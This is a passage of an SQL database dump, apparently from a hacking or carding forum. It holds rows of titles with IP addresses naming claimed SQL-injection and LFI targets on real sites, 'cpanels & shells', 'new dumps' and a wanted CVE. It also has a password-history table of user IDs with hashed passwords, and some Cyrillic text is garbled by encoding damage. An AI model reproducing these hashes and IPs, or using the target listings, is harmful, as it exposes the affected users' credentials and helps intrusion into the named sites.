(713, 1463759145, 387, 35, 1825, 0, 0, 0, '', 15, '*.tomsk.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(714, 1463759145, 387, 35, 1827, 0, 0, 0, '', 15, 'mastercard', '37.187.129.166', '', 0, 0, 0, 0, 0),
(715, 1463759145, 387, 35, 1828, 0, 0, 0, '', 15, '*.dlink.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(716, 1463759145, 387, 35, 1831, 0, 0, 0, '', 15, 'Kuplu CVE-2014-6369 (will buy)', '37.187.129.166', '', 0, 0, 0, 0, 0),
(717, 1463759145, 387, 35, 1833, 0, 0, 0, '', 15, 'ИнтересÂен Whatsapp', '37.187.129.166', '', 0, 0, 0, 0, 0),
(718, 1463759145, 387, 35, 1836, 0, 0, 0, '', 15, 'easyanticheat.net', '37.187.129.166', '', 0, 0, 0, 0, 0),
(719, 1463759145, 387, 35, 1837, 0, 0, 0, '', 15, 'AntiCloudFlare or how to detedt real IP', '37.187.129.166', '', 0, 0, 0, 0, 0),
(720, 1463759145, 387, 35, 1850, 0, 0, 0, '', 15, 'cpanels & shells', '37.187.129.166', '', 0, 0, 0, 0, 0),
(721, 1463759145, 387, 35, 1857, 0, 0, 0, '', 15, 'sqlmap output', '37.187.129.166', '', 0, 0, 0, 0, 0),
(722, 1463759145, 387, 35, 1860, 0, 0, 0, '', 15, 'neal-schuman.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(723, 1463759145, 387, 35, 1863, 0, 0, 0, '', 15, 'lakedirectory.net', '37.187.129.166', '', 0, 0, 0, 0, 0),
(724, 1463759145, 387, 35, 1867, 0, 0, 0, '', 15, 'norfolkadmirals.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(725, 1463759145, 387, 35, 2236, 0, 0, 0, '', 15, 'gigabyte.com SQLi', '37.187.129.166', '', 0, 0, 0, 0, 0),
(726, 1463759145, 387, 35, 2329, 0, 0, 0, '', 15, '[sql-inj] *.ppt.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(727, 1463759145, 387, 35, 2330, 0, 0, 0, '', 15, '[SQLi+Base]hostinger.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(728, 1463759169, 387, 35, 1028, 0, 0, 0, '', 15, 'Sec4ever', '37.187.129.166', '', 0, 0, 0, 0, 0),
(729, 1463759169, 387, 35, 1650, 0, 0, 0, '', 15, 'rghost.ru | <marked as private> bypass', '37.187.129.166', '', 0, 0, 0, 0, 0),
(730, 1463759169, 387, 35, 1657, 0, 0, 0, '', 15, 'ojooo.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(731, 1463759169, 387, 35, 1674, 0, 0, 0, '', 15, 'sql sovet.ikea.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(732, 1463759169, 387, 35, 1680, 0, 0, 0, '', 15, 'onlineauction.com LFI', '37.187.129.166', '', 0, 0, 0, 0, 0),
(733, 1463759169, 387, 35, 1712, 0, 0, 0, '', 15, 'old.i-teco.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(734, 1463759169, 387, 35, 1714, 0, 0, 0, '', 15, 'pz.gov.ua SQLi', '37.187.129.166', '', 0, 0, 0, 0, 0),
(735, 1463759169, 387, 35, 1723, 0, 0, 0, '', 15, 'hackerstorm.co.uk SQLi', '37.187.129.166', '', 0, 0, 0, 0, 0),
(736, 1463759458, 387, 37, 1024, 0, 0, 0, '', 15, 'wasm', '77.247.181.162', '', 0, 0, 0, 0, 0),
(737, 1463759458, 387, 37, 1034, 0, 0, 0, '', 15, 'belegit.net', '77.247.181.162', '', 0, 0, 0, 0, 0),
(738, 1463759458, 387, 37, 1697, 0, 0, 0, '', 15, 'mifcom.de', '77.247.181.162', '', 0, 0, 0, 0, 0),
(739, 1463759458, 387, 37, 1854, 0, 0, 0, '', 15, 'europarl.europa.eu', '77.247.181.162', '', 0, 0, 0, 0, 0),
(740, 1463759458, 387, 37, 2347, 0, 0, 0, '', 15, 'phreaker.us', '77.247.181.162', '', 0, 0, 0, 0, 0),
(741, 1463759458, 387, 37, 2463, 0, 0, 0, '', 15, 'new dumps', '77.247.181.162', '', 0, 0, 0, 0, 0),
(742, 1463759458, 387, 37, 2469, 0, 0, 0, '', 15, 'SpyProof Vpn', '77.247.181.162', '', 0, 0, 0, 0, 0),
(743, 1463759458, 387, 37, 2483, 0, 0, 0, '', 15, 'topface.com', '77.247.181.162', '', 0, 0, 0, 0, 0),
(744, 1463759458, 387, 37, 2502, 0, 0, 0, '', 15, 'shadowave.com', '77.247.181.162', '', 0, 0, 0, 0, 0),
(745, 1463759895, 387, 16, 1684, 0, 0, 0, '', 15, 'Best AES Crypto', '77.247.181.162', '', 0, 0, 0, 0, 0),
(746, 1463759895, 387, 16, 1849, 0, 0, 0, '', 15, 'Check4you.net Online Free Scanner', '77.247.181.162', '', 0, 0, 0, 0, 0),
(747, 1463784301, 388, 16, 1029, 0, 0, 0, '', 15, 'ÑÂúрøÿт ôûѠñрутð чõрõ÷ рõòõрÑÂýыõ ôþüõýы', '5.220.247.20', '', 0, 0, 0, 0, 0),
(748, 1463784331, 388, 16, 1056, 0, 0, 0, '', 15, 'ðòтþüðтø÷ðцøѠÑÂñþрð øýфþрüðцøø ýð ÑÂõрòõрõ.', '5.220.247.20', '', 0, 0, 0, 0, 0),
(749, 1463784331, 388, 16, 1130, 0, 0, 0, '', 15, 'privnote ðýðûþó.', '5.220.247.20', '', 0, 0, 0, 0, 0),
(750, 1463784331, 388, 16, 1188, 0, 0, 0, '', 15, 'py xrum', '5.220.247.20', '', 0, 0, 0, 0, 0),
(751, 1464452052, 387, 32, 2508, 0, 0, 0, '', 21, '', '85.25.103.69', '', 0, 0, 0, 0, 0);
DROP TABLE IF EXISTS `notice`;
CREATE TABLE `notice` (
`noticeid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`displayorder` int(10) unsigned NOT NULL DEFAULT '0',
`persistent` smallint(5) unsigned NOT NULL DEFAULT '0',
`active` smallint(5) unsigned NOT NULL DEFAULT '0',
`dismissible` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`noticeid`),
KEY `active` (`active`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `noticecriteria`;
CREATE TABLE `noticecriteria` (
`noticeid` int(10) unsigned NOT NULL DEFAULT '0',
`criteriaid` varchar(250) NOT NULL DEFAULT '',
`condition1` varchar(250) NOT NULL DEFAULT '',
`condition2` varchar(250) NOT NULL DEFAULT '',
`condition3` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`noticeid`,`criteriaid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `noticedismissed`;
CREATE TABLE `noticedismissed` (
`noticeid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`noticeid`,`userid`),
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `passwordhistory`;
CREATE TABLE `passwordhistory` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`password` varchar(50) NOT NULL DEFAULT '',
`passworddate` date NOT NULL DEFAULT '0000-00-00',
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `passwordhistory` (`userid`, `password`, `passworddate`) VALUES
(101, 'bcb86b13a2df1debf5ba7b9ddca48b35', '2015-01-04'),
(102, 'c8af7c98f71dcd31cb5aef96e1298b91', '2015-01-05'),
(103, '2c36da64a4746f05e7a45a071b4f92bd', '2015-01-05'),
(104, 'f8b3d9292d5512f5613cdecdad3b1d16', '2015-01-05'),
(105, 'aa09068a391fe07b60ba115c77d92c22', '2015-01-05'),
(106, 'dd30da0a38fc144e8e595f39adee45e7', '2015-01-05'),
(107, 'ee187d3d048437fedf0e7a2ca308b360', '2015-01-05'),
(108, '79a857f3bfd013a3e131fdcde0900c4e', '2015-01-05'),
(109, 'ae4860582b5cd28e3f362fd6ef2fc5b4', '2015-01-05'),
(110, '00605708e418129a3ebf5c511b22aad2', '2015-01-05'),
(111, 'f995bbe230bc74387ece272819e8ce21', '2015-01-05'),
(112, '1cb38f7a88e3d0e776e14317e52a92bc', '2015-01-05'),
(113, '7d2f1ecf7e38c4901c6b02489e5049ed', '2015-01-05'),
(114, '058968453491ef2fbcf0825cb755334a', '2015-01-05'),
(115, '5f467d4b92d667ba340212fc290263c1', '2015-01-05'),
(116, 'edca3c9fc9d51703467d3bbc415585d9', '2015-01-05'),
(117, 'b3c30c20ba676a1a179ec7c9f9510228', '2015-01-05'),
(118, '4ea5a9943329a04a64d45e5e5564bee8', '2015-01-07'),
(119, '5e8658021452526b7b4c55ada4b60580', '2015-01-07'),
(120, '9799eb7aedd44aef38ae3558e5cd0c96', '2015-01-07'),
(121, '87e04041da180d338101076564369b52', '2015-01-07'),
(122, '43a00345860d8e27fa7ad81366d43fd9', '2015-01-07'),
(123, 'd58c293b1e440f56aaeed69b6d4165bf', '2015-01-07'),
(124, '44223e91b63a7e28b650a83175d81bac', '2015-01-07'),
(125, '64a22ccd423a70e94961907f7c08a913', '2015-01-07'),
(126, '1bc0774b6f014337406ed7ecd3332ce0', '2015-01-07'),
(127, '9b6130dede3052f20156c5c9a099e465', '2015-01-07'),
(128, 'fd24ff3c185e4c0c132f8ea9d6c7736e', '2015-01-07'),
(129, 'ff01401df104f0b25d77096ec27e6949', '2015-01-07'),
(130, '97891883374c796adc50024c61aa6fdf', '2015-01-07'),
(131, '2df9fbd0462a0eb9d98dfbfa6faecfa8', '2015-01-07'),
(132, 'af55e9cdc8b30b6e2a015d61e20e22ce', '2015-01-12'),
(133, 'b502dec4fcb869233051d85690e3376e', '2015-01-12'),
(134, 'f3d58628f6996dcd8de8cd1a11f7dffa', '2015-01-13'),
(135, '9d51a78fc775ecc628db65dde826d993', '2015-01-13'),
(136, 'badbd226fe715b33824613665a879ce3', '2015-01-19'),
(137, '8e85fa703414c712ddb6ba8b9bc12c11', '2015-01-19'),
(138, '514afc5d9715b358e7b15158b8b4cc89', '2015-01-19'),
(139, '9ac5c9856c353659b859c7f196ec3f6f', '2015-01-19'),
(140, '314a000c890ce14db8b1c04276a516a2', '2015-01-19'),
(141, 'c8ec27d1d127ad4e2e9daa9e9d6f821a', '2015-01-19'),
(142, '5cc8510178f215d38fdea9e7e399794f', '2015-01-19'),
(143, '0176c95cc4c80f4e496cdd73f3461e04', '2015-01-19'),
(144, '0fbc0181dbd9f6e55cc2b0f4914b9344', '2015-01-19'),
(145, 'f23a7714d21997ef64283dbbf4b95141', '2015-01-19'),
(146, '9672a0b0d74af64522ed154db16f4a6c', '2015-01-19'),
(147, '25451c128e89ec307013716d13a9aeae', '2015-01-19'),
(148, 'b15969c0f90d4b95c72f625ceeb423e5', '2015-01-19'),
(149, 'f1f48dea24ad6b767475ed6dab7da8ee', '2015-01-19'),
(150, '1e41787c7d8cfc9ca4effba5b3198984', '2015-01-19'),
(151, '0836e788d62f645176a5accc533e0e02', '2015-01-19'),
(152, '562475157d1804c9ef8763fc3b42cb59', '2015-01-19'),
(153, '2b64e97b7796c4de357d634d941c085e', '2015-01-19'),
(154, 'fd18206a9d8efab97204fce15fcbf171', '2015-01-19'),
(155, '9b599de17d8c373237511c5939e7b6d2', '2015-01-19'),
(156, 'e02b2a5bbc22294f5e0557cc1b8d8814', '2015-01-19'),
(157, '615d9a2b9bf4f87a19257aa5e89013cc', '2015-01-19'),
(158, 'b3198de416af8cfaad4f28a26c93888f', '2015-01-26'),
(40, '98a0c8723f52697b68d678ba080ff23f', '2015-02-27'),
(46, 'b1547e9f02e4cfc1ed32e8b3a55305de', '2015-03-02'),
(40, 'f3952404bcdd03c4812671bc4815699d', '2015-03-03'),
(46, '3e781e30693fcd54514e17e52a79c181', '2015-03-04'),
(160, '74a89865fa179567447890fe6087d661', '2015-03-23'),
(159, 'd62843766dfbb6edadf819aa54964ca9', '2015-03-26'),
(40, 'a6572eaf08ad56433d5e1c1261f2716b', '2015-03-26'),
(40, '5679d72c45c4caea5e9b4ba7897abce9', '2015-03-26'),
(7, '70ee4d57cfd344017c68e91ef808a004', '2015-03-27'),
(161, 'fc3ca705c31f797349ceaafd2e338a5d', '2015-03-27'),
(34, '7697920394098ac1e4b371dd207f08dd', '2015-03-30'),
(162, 'a316385e10f39beaafeb0d4a0185790b', '2015-03-31'),
(101, '098cc84129e56ddcd3eaa453f77b6060', '2015-04-21'),
(163, 'ac27cfc876680eb5127646234fbe0467', '2015-06-25'),
(100, 'adfb30af0ed9d89eb85ec7457ab04657', '2015-06-29'),
(164, 'e4e90daed549b318b5fdde7ace9a17a3', '2015-06-29'),
(165, '83e4f1c73b079e34940b8d03cf75563a', '2015-06-30'),
(166, 'e0f2ba360e27d5e307169d2ab793bc0c', '2015-07-01'),
(167, 'ea1cf21f0e489fd74fd2b1b3e08ea598', '2015-07-20'),
(100, '97f869a3c33b263159093940ef0ebe5e', '2015-07-29'),
(168, '3009fd6bd0efc54d36d3819ca0dca82f', '2015-07-30'),
(169, '812d47c80a35d5737550593adae6345e', '2015-08-08'),
(172, '2af03ac15ffdf0feb93e4eb6f3f53683', '2015-08-10'),
(170, 'e852085741075dffb0688812d18f932c', '2015-08-13'),
(174, '7512983192b84d7aa35a5e93d4ff68bb', '2015-08-19'),
(100, 'd39d22b7c13f29dd6a39a5d154d9caa1', '2015-08-24'),
(1, '6a9186a81f96dbb34bfd10861a1b9266', '2015-08-25'),
(175, '22c58e8238b0cb6d695c7d54342eee2d', '2015-09-02'),
(176, 'cb57fd43763244eec0c438e88031fe2a', '2015-09-02'),
(100, '0d509386c8d8caf96e72ce2c6aee8e48', '2015-09-02'),
(173, '2c094d3198c90b77019e5fe4f16846f3', '2015-09-07'),
(100, 'e5a1093ec511befd44170327136627a2', '2015-09-14'),
(177, 'e37d3745540cdee62b3a4da8f14ea52c', '2015-09-16'),
(178, '0c1343f361d10e226cf026c3abf106c9', '2015-09-16'),
(179, '7145391329ed7ee633fc4e612760e4e6', '2015-09-18'),
(180, 'd35f886e8f0e0e52d8254d4810e64bbf', '2015-09-19'),
(158, '64a7e2d420318e1eb5981500f7bace5a', '2015-09-20'),
(181, '0a649ecfe7bcce99f9f664f3cdf3ac6c', '2015-09-20'),
(181, '81a20eacfab8a887a7f2a56519856fae', '2015-09-20'),
(41, '739341597fb0f75ce8ce230461b7705f', '2015-09-20'),
(182, 'e59128ba913046e67c255b280cd46b0b', '2015-09-21'),
(183, '5db6285e1ca7873c0c0c8c860da2b87f', '2015-09-21'),
(182, '1b8e58a357915a15e3daa04d9f2a29b4', '2015-09-21'),
(184, '4e8ff18ac332538499796dd4792451ea', '2015-09-21'),
(185, '7de29677189f90d1b4c6c42e9ac6c606', '2015-09-22'),
(186, '8ca3c964aa81cffe3ceb9a230635f6fb', '2015-09-24'),
(187, 'aa14f7aa817fa5458e9980bbfb8f842f', '2015-09-24'),
(29, '6ef31b696b1f0c6f73f67f8c3018e344', '2015-09-27'),
(188, '974de389ae66767386d2ef37500ca9a8', '2015-10-03'),
(189, '20b11b899963cc35d87cf3a1ff45d01a', '2015-10-10'),
(171, '1e28383d79765d260460296250bcff02', '2015-10-14'),
(164, '73413ae4133db7a94b24e363bded8402', '2015-10-26'),
(190, '7b2a983146c6317f235d7228c410bb1e', '2015-10-27'),
(191, 'b899fe49298c0778dff95e52b6f884a9', '2015-10-30'),
(192, '6db81cfb26fdcbcbd3ab9bc9adbafd19', '2015-10-30'),
(193, '411a43d353379686fd067bf5899c54ef', '2015-10-30'),
(194, '06dbe90a74718847fdb8ad9918b70623', '2015-10-30'),
(195, '9b95c7c5179cd0374c3fe2cf28d8a82a', '2015-10-30'),
(196, '6c0dd38220548488b8b0632ec366cca0', '2015-10-30'),
(197, '55a4776010327403d4f885b9174083eb', '2015-10-30'),
(198, '2e175be6bb0515597e57cfd33f7826e7', '2015-10-30'),
(199, '54123a02d545bfee206b4dcc8768f624', '2015-10-30'),
(200, '0346d6ebc7cdedf99bb404d24843813c', '2015-10-30'),
(201, '0b96f5907f8aa1c8e47347f23b86f35a', '2015-10-30'),
(202, 'd1e096600712a94973addfab8d03adad', '2015-10-30'),
(203, '119db764d0bbd8a2cebd3c6086507ba5', '2015-10-30'),
(204, 'd76d3773bd11570725364b94e25c25d3', '2015-10-30'),
(205, '99014406df723cc48c530d514dd16066', '2015-10-30'),
(206, '112a455a14de8737357f8171a6b8d1ae', '2015-10-30'),
(207, '03effb4d9f6731e22648bb0819439dcf', '2015-10-30'),
(208, '6eb8fd9431613c4f5034067700ae61b9', '2015-10-30'),
(209, 'ce149de62ad8edc69523f70110c54fe8', '2015-10-30'),
(210, '361e74b6d6aab655277e921bff4d7a1b', '2015-10-30'),
(211, 'e2f9016074f4e96c49ad983f88ee1512', '2015-10-30'),
(212, 'dc154864424505992a3f92cc688fef81', '2015-10-30'),
(213, '559422617d42ca083e8db66e04dc88dc', '2015-10-30'),
(214, '6d83b7f3a2e5fcf174db8b62098a21c5', '2015-10-30'),
(215, 'f681e5ff279d06548c52ee4aa82e0cd9', '2015-10-30'),
(216, '9896b87f5094e7a286a4d63417f27fb2', '2015-10-30'),
(217, '87d87a35c1841271c5c907253910665d', '2015-10-30'),
(218, '0cd2d89f79feb17a964174daed2b8517', '2015-10-30'),
(219, '158725d1f3e6727d54010b47fccf551c', '2015-10-30'),
(220, '96a33604467e34009339747d6260f652', '2015-10-30'),
(221, '87779363a40f8dc5a7bf6071b6815d09', '2015-10-30'),
(222, '43a533eb0b48ae8773789452fffc5c71', '2015-10-30'),
(223, '551e66159e70df30cae90d424f058fd8', '2015-10-30'),
(224, 'a65824bd714dbb58bd37478558f3da4f', '2015-10-30'),
(225, '760e7badd87dc63d43783d2c73aee865', '2015-10-30'),
(226, 'ee7ea7c363b3bb7ef8b7e03bb8adeb34', '2015-10-30'),
(227, '2b9f425a94bf3b9fdf8fd1761fa51c73', '2015-10-30'),
(228, 'ae15c1ab4655cbc5f3abe65c985524f7', '2015-10-30'),
(229, '20bbdeaff829e6b281238a5bad4ccc54', '2015-10-31'),
(230, '09919cd220b64ffab22ecd989d9cabe7', '2015-10-31'),
(231, 'a7b02b535da40a7ca2e815ec009218cc', '2015-10-31'),
(232, '15350e3993c30662024b7e47326a5d70', '2015-10-31'),
(233, 'da1a400225eeb262442a25c1eb7c75d8', '2015-10-31'),
(234, '27d23cb2e92d3a7ea39e5941358c3bd9', '2015-10-31'),
(235, 'e7b1470765a4fa7f03509f39da9c9561', '2015-10-31'),
(236, 'c25b8d8c9f966cb886befc0396d95e1f', '2015-10-31'),
(237, 'bbe8fffe8612251758559f2a0f566041', '2015-10-31'),
(238, 'cee560579530f4a52a0806f22bb46863', '2015-10-31'),
(239, '1624073593c422883e8a6b3902a6e955', '2015-10-31'),
(240, '3a9516e11fded13e73b5ddd04a82fa47', '2015-10-31'),
(241, 'dbcff96ee3fa874f5ebf73140b2c58a6', '2015-10-31'),
(242, '9b1fa3f59b250a1f2b16a02e3852811f', '2015-10-31'),
(243, '917a802d4a163ccd3f4872c2d443c039', '2015-10-31'),
(244, '21b3676f6e30c9857fa473b0cb620db4', '2015-10-31'),
(245, '0e1af400c07b528114e5cb7e4b3ddf7b', '2015-10-31'),
(246, '9d7f0fe982d9f76e7fe654366d7ea899', '2015-10-31'),
(247, '4281eeecbb5e1ec8ecda4efc134bd9df', '2015-10-31'),
(248, 'd4def808a21f9a7db5d7677cb6092983', '2015-10-31'),
(249, '182396959f5dad956bee35fa50c416bc', '2015-10-31'),
(250, '6d982b8ae26a9b68cd95693e20fa639b', '2015-10-31'),
(251, '92c0eb3bdb208a8bb1d8eb8c8d1ec5f2', '2015-10-31'),
(252, '402b25cac362a509b6ad62b6126a52cc', '2015-10-31'),
(253, '840751b9af4d4d01e194ddb76dfa4795', '2015-10-31'),
(254, '8a8e9b5db056e50207bbeee4ae535a10', '2015-10-31'),
(255, '059d223275e92472a58a5f2a7bab6e35', '2015-10-31'),
(257, '5b6d82bf36025e9a6010b2877ca78250', '2015-10-31'),
(258, '7d14b4359b54f7e443aaa6ac76f77127', '2015-10-31'),
(259, '3a01d41287082b9f7ee465582644b318', '2015-10-31'),
(260, '21e97d7f10f6040c44119ec4b3d1c781', '2015-11-01'),
(261, 'd192ee59a44ae30ff56ca8141bf7363a', '2015-11-01'),
(262, 'e640b1c650cd218e02103f97265dadfd', '2015-11-01'),
(263, 'bb9467f932f6dee949e5a93885411cbc', '2015-11-01'),
(264, 'ace6bf9f20c781d66f9961debedb9b3e', '2015-11-01'),
(265, 'a2917e66cd6940574d9844d2f83af98d', '2015-11-01'),
(266, '19f4f692593082703c49bcddc95d4456', '2015-11-01'),
(267, '49cddf23bf774cf28b13d81ba010ff58', '2015-11-02'),
(268, 'c33ce2196786a51f1b29f29e298eede1', '2015-11-02'),
(269, '18842d395109471587de2774f7c505ca', '2015-11-02'),
(270, '71de928403c1640cc99f2b36e7be3205', '2015-11-02'),
(271, 'bf40b9f60a747246c78810d52e5f698f', '2015-11-02'),
(272, '7ca52561f80bdd17ed075d700f8ac502', '2015-11-03'),
(273, 'a919dcbfc0d39d4c6f690f51d67f5e08', '2015-11-03'),
(274, '062e828c81b8680f6c6302f4869ec015', '2015-11-03'),
(275, '6476c2e62acb8c6698500ec5c551972d', '2015-11-03'),
(277, 'e966539b5696467ccbbb14501836f2ef', '2015-11-04'),
(278, 'b3c0263b8c1fc70b368439265c5d8881', '2015-11-05'),
(279, 'f0d2e93f6097cfeedf5d00f5e4dbd1c5', '2015-11-05'),
(280, '7f1250d7cdfc0219dd12a2a327e80c65', '2015-11-05'),
(281, 'c07579be59c6939ff77c132e74b6cc03', '2015-11-05'),
(282, '5678a7b99d942ec6befbf456950f4cf8', '2015-11-05'),
(283, 'cf8d6503a91560d6944554d99225830f', '2015-11-06'),
(258, '284dbed9f81056a9787b6741a208b55f', '2015-11-06'),
(284, '88e0c547bb3347464de031fae6b07c45', '2015-11-10'),
(285, '484d5e53aa665e8f1bc362a2bc3a7f83', '2015-11-10'),
(286, '53f6157e4e069f1b9691e7a6edd2e260', '2015-11-10'),
(276, 'e88c1b8b160a474168494eef17d0c2d9', '2015-11-11'),
(276, '4a80b3dbfb88517279322667981893a0', '2015-11-11'),
(288, '116eeb0836ecd102102b44dd8093c767', '2015-11-11'),
(289, '1f92d6197947cea14ee019c753a2a1c0', '2015-11-11'),
(290, 'f5b3377ae80367a481a17b1453c5d4ab', '2015-11-12'),
(291, 'c9bd51677b77f34d793da23e9080779c', '2015-11-12'),
(292, '6185d096acdf6667bdbb6b5a0239bd9c', '2015-11-13'),
(293, 'af8cf18168b3e56deaa8fe34ce67b4b1', '2015-11-13'),
(294, 'd7cee390db4a88ca80ab41e69be2a42e', '2015-11-14'),
(295, '1cb346b57d442d0b35c8c8c0def3d39d', '2015-11-14'),
(295, 'a6cf0354bccaf68a96ad37de45b666d7', '2015-11-14'),
(296, 'ea1c6170cb385cfef7cde192e5272d61', '2015-11-16'),
(297, '11d5bb90ae3394f23520e5113440a6fa', '2015-11-16'),
(298, '321d3c4d742cad554bdfbdecca0dce6a', '2015-11-16'),
(299, 'e9b7284681c68273bb574501f9cd862b', '2015-11-17'),
(300, '8ca38957119e5a620253a049a36498e7', '2015-11-17'),
(301, 'f160254e4420920e6818091765e6d754', '2015-11-17'),
(302, '62055b2a563fa6faa7c07e7d4696155d', '2015-11-17'),
(303, '2db0cbefb9dda42276dfd7369a55a3d1', '2015-11-18'),
(304, 'd12623f8dbd1b5d7b2e4fff8dcdb3c63', '2015-11-18'),
(305, '4c691b98bce04f1ffe7916db61743e2e', '2015-11-19'),
(306, 'fd435312dbfd5b6d26bfb4682aa6d1c4', '2015-11-19'),
(307, 'fbb41c0a2f5eff5016056b835ef6f184', '2015-11-20'),
(308, 'f00d13bd571ac485c90188a829833cd8', '2015-11-20'),
(309, 'd59ec24c5e4ef1ea3f24edfc0c88d40f', '2015-11-21'),
(310, 'c910c2e2e21e8b9ede147c34cf2ad99b', '2015-11-22'),
(256, '5e050e8b07d92b89f72c6a618ad18c02', '2015-11-23'),
(311, '4521d7d4880bf100c143965b598ff697', '2015-11-24'),
(312, 'ea03294dfa9169fd94fa9ce8c527c59e', '2015-11-24'),
(313, '45d522b54357b19904ce16305c5eb0b7', '2015-11-25'),
(314, '6b1be50482ccd23cd0d1d287447a5cb1', '2015-11-26'),
(315, '4a54fe1ce84db242bcc7640daaa39bab', '2015-11-27'),
(316, '05aebdddb38b14f0b9d5cfaea6668e53', '2015-11-27'),
(317, '03682ee0c5d2ab6f1d56a398bdbdae23', '2015-11-28'),
(318, 'f1657a57c4a9540e58b90fd59c504d27', '2015-11-28'),
(319, '05a39c47eb4177c36848c3fc7a05cc2f', '2015-11-30'),
(320, '878bcbee7ef9886926a2fb2d8be84655', '2015-12-01'),
(321, '40b4bcc6f22c546492349d86aa8becc9', '2015-12-01'),
(322, 'c1fd66576bee4a34d3f75f662e52ef1f', '2015-12-02'),
(323, 'b15d4dd4e9e3946f0685dfa32f654963', '2015-12-02'),
(324, '8c25398fc3696bc140baa9b555b6395c', '2015-12-02'),
(325, 'be9d5355eb6c210b0e097514134cc4a9', '2015-12-05'),
(326, 'b890b67fd012a138d1b4fa85636a995a', '2015-12-05'),
(327, 'ec59d799c901517cd5b7a68192818fe4', '2015-12-06'),
(328, 'b1d3f1427c77858c3ef25672e7381295', '2015-12-06'),
(329, 'f7cdee7e5320f3219f72f12019adfdcf', '2015-12-08'),
(330, 'd225cee0be45cede7ccfdcaa73499db4', '2015-12-08'),
(331, '22c254a453fd190b032bde80d8cd2295', '2015-12-09'),
(332, 'bf167994ce6b2868526ab544c07d80e3', '2015-12-09'),
(333, '0440e8976588c92be98d182ad8ff84a6', '2015-12-09'),
(334, '64b9e98b7272cecfcb37c36f5660ed94', '2015-12-10'),
(335, 'a73a2d557b3df9a595f8160556143953', '2015-12-11'),
(336, '8fed415e1349f5e72e4c100f30e315d7', '2015-12-11'),
(337, 'e4d64682005d17bee329df07b1f7f7ce', '2015-12-11'),
(338, '00706c7ab2b9b22d9bdb6a03814f5eba', '2015-12-16'),
(339, 'ed11ace7de2603e7ebe05b1aa51f12be', '2015-12-17'),
(340, '13d853982b69eacc227333a72d467156', '2015-12-19'),
(341, '6279bf2d31c7d3fd7eb276045922a8c2', '2015-12-20'),
(342, 'c8138e8693e77c0e270798e98c089b87', '2015-12-21'),
(343, 'f3182654db7e7974de59154700762cf1', '2015-12-22'),
(344, '804d43b6f580b299dc8e3cb37c01886c', '2015-12-22'),
(345, 'e85703df3a04b692dcaea2df489a15b3', '2015-12-23'),
(346, 'b89b31a91a804589f8ee1d8364296b1b', '2015-12-23'),
(347, '93c841f0c826ea2f48b3334e02f0259e', '2015-12-24'),
(348, 'f8a829f95e17e9c4d8055563957be29c', '2015-12-24'),
(349, 'b711fc6f08122866d56ee4c6ddd9e083', '2015-12-24'),
(350, '3b88e0aa461c0ac35a7269955ff7f0f8', '2015-12-24'),
(351, '6ee947b44c345e73f82dc28f1ba142b1', '2015-12-25'),
(352, '6638e3aeeb5e57bdea2b015d6c500eab', '2015-12-25'),
(353, '6cf0ffee17888897493f6201e9236b41', '2015-12-25'),
(354, '6fef9861e9dcb33516ecc5da19a0351b', '2015-12-26'),
(348, '34daecb67ac8446545d376c05bb2a6de', '2015-12-26'),
(355, '8c60f31c33bd52429f9d2b89e5cd3391', '2015-12-26'),
(356, '717f29d319179376539491b327aef65d', '2015-12-26'),
(357, '09e4b7cd8afd9203f5cfbc4899b3794d', '2015-12-27'),
(358, '6aea8737acd2821b3343dff8bd87d617', '2015-12-27'),
(359, '66f98fa17de880bca495dff21d3fe9a2', '2015-12-27'),
(360, '5d2e3b1a7bfd97616fb6b6956c931412', '2015-12-28'),
(361, '3182befb19b221bb7d773983240e4de5', '2015-12-29'),
(362, '1fb8c3ab96df4a73b3cea20c9037b9a6', '2015-12-29'),
(363, 'b1039ec030644e54e48ed051e74e36a3', '2015-12-29'),
(364, '098d22edcad920617567c780a3fdd4db', '2015-12-30'),
(365, '7ca46e136c76589bde3e6ea58cb0a920', '2016-01-01'),
(366, '226ae4c1020da7c791b506f707065f5c', '2016-01-02'),
(367, '6df31c2bbe5a5f8d0fba1a1fd54c0d5c', '2016-01-03'),
(368, 'a1a884d1e8da3217e115b83263e6bd76', '2016-01-04'),
(369, '6595288c0470658d8f55a99363e34c21', '2016-01-06'),
(370, 'ff5d3fa3f857b8f85ba04edb7ad72fc6', '2016-01-06'),
(371, 'ebd0b46f3e9dba610bb6c4162d697c39', '2016-01-06'),
(372, '9a78d061e02ceba8f19e32ef67315361', '2016-01-07'),
(373, '01c7faea4f9866a3548d2c12f6986ca0', '2016-01-08'),
(374, 'fcf357bc6a25996f026ea88d1e8f75d4', '2016-01-08'),
(375, '38af786ac15e20986bd68db11db72afe', '2016-01-09'),
(376, 'b964e0cd6e15e1fe3cd9c460acbb56f1', '2016-01-10'),
(377, 'cc6180b2f179f8e354f37e99241915e4', '2016-01-11'),
(378, '728fe722171735fbc4cc00b2f2567e11', '2016-01-11'),
(379, '86ab18b541761254f9b469084afdf7da', '2016-01-12'),
(380, '09c9048e1646a0512a7af04f63e8bf6e', '2016-01-13'),
(381, '2f82cfce2d39686a6e90ec0327f26f2e', '2016-01-14'),
(382, '669e2a409b33332d54f84c8d1b4f8ca1', '2016-01-14'),
(383, 'b7a1c8a5d97359c3924b6ece0872f302', '2016-01-27'),
(100, 'b85d162b1300ecc5db38d6d62abd2dc0', '2016-02-21'),
